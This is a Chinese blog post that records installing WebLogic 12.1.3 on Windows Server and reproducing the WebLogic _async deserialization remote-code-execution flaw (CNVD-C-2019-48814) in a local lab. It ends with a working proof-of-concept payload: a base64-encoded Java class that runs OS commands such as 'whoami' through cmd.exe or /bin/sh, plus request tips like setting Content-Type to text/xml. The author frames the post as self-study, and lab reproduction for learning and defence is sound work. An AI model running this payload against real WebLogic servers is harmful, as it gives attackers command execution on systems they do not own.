以前总是不喜欢自己搭环境验证漏洞,后面觉得总不好,大概少了可依赖的人,还是要自己慢慢一点点的学习。


1、验证环境

服务器:win server 2008 R2 64位
jdk版本:1.8.0_65
weblogic版本:12.1.3

2、安装weblogic

首先登陆oracle账号,下载weblogic,地址如下:
https://www.oracle.com/technetwork/cn/middleware/ias/downloads/wls-main-091116-zhs.html
我下载的是fmw_12.1.3.0.0_wls.jar,本来想下载10.6.3,找不到64位的,就下载了12.1.3的通用,看有资料说weblogic不分64位和32位,通用的就行。
从windows安装weblogic到复现CNVD-C-2019-48814
因为下载的是jar文件,以管理员身份运行cmd,输入java –jar 目录+jar进行安装,这里遇到一个问题,运行结果显示“失效的JdK”,后经查阅资料
解决办法如下:
检查java是否安装成功,发现输入java没问题,输入javac有问题,重新加环境变量,然后javac没问题,发现还是出现jdk失效的问题,最后将fmw_12.1.3.0.0_wls.jar文件复制到%JAVA_HOME%\bin目录下,然后执行成功,如图:
从windows安装weblogic到复现CNVD-C-2019-48814_第1张图片
出现图形界面后就选择下一步直到安装完成。如图:
从windows安装weblogic到复现CNVD-C-2019-48814
然后开始配置weblogic,如图:
从windows安装weblogic到复现CNVD-C-2019-48814_第2张图片
勾选全部项,下一步
从windows安装weblogic到复现CNVD-C-2019-48814_第3张图片
从windows安装weblogic到复现CNVD-C-2019-48814_第4张图片
配置用户名密码
从windows安装weblogic到复现CNVD-C-2019-48814_第5张图片
然后均不需要更改,一直下一步,最后点击创建。找到图中目录,运行cmd文件,启动weblogic服务
从windows安装weblogic到复现CNVD-C-2019-48814_第6张图片
运行成功
从windows安装weblogic到复现CNVD-C-2019-48814
浏览器访问:
http://localhost:7001/console/login/LoginForm.jsp
出现如下错误,继续刷新,或者换个浏览器就行。
“Deploying application for /console/login/LoginForm.jsp...”
利用之前设置的用户名密码登陆之后如图:默认用户名密码是weblogic/weblogic123
从windows安装weblogic到复现CNVD-C-2019-48814_第7张图片
如此weblogic算是在windows部署好了,现在开始进行cnvd-c-2019-48814漏洞的复现。

3、漏洞复现

访问:/_async/AsyncResponseService,存在以下页面,就有可能存在漏洞。
从windows安装weblogic到复现CNVD-C-2019-48814_第8张图片
最开始用的ie,发现ie抓不到127.0.0.1:7001的数据包,换成谷歌就可以了。
然后利用网上的poc进行测试,但是不如人意,出现如下错误
从windows安装weblogic到复现CNVD-C-2019-48814_第9张图片
查看报错信息,Null content type,发现数据包头部没有content-type参数,然后加上就能执行命令弹出计算器了。
从windows安装weblogic到复现CNVD-C-2019-48814_第10张图片
再次看了一下,最开始是抓包直接把get改成post,所以没有content-type参数。然后再次抓包利用burp右键更改method如图,数据包会自动添加两个字段,但是依然报错,content-type错误,所以得记得手动把content-type改成text/xml格式
从windows安装weblogic到复现CNVD-C-2019-48814


在写文章时看到一位博主的签名,觉得很有道理,动手一遍总会有收获。
“眼观千遍 → 耳听万遍 → 不如手动一遍√”


后续在github上找了很多poc,几乎都不能利用成功,今天尝试了一个可以,不过好像是利用wls-wsat组件执行命令的,所以可能依然使用的是cve-2017-10271的poc。如图:
从windows安装weblogic到复现CNVD-C-2019-48814_第11张图片
代码如下:(不保证代码安全问题)
; xxxx ;

org.slf4j.ext.EventData




yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7




ResultBaseExec



whoami



        
            
                
                    
                        connectionHandler
                            true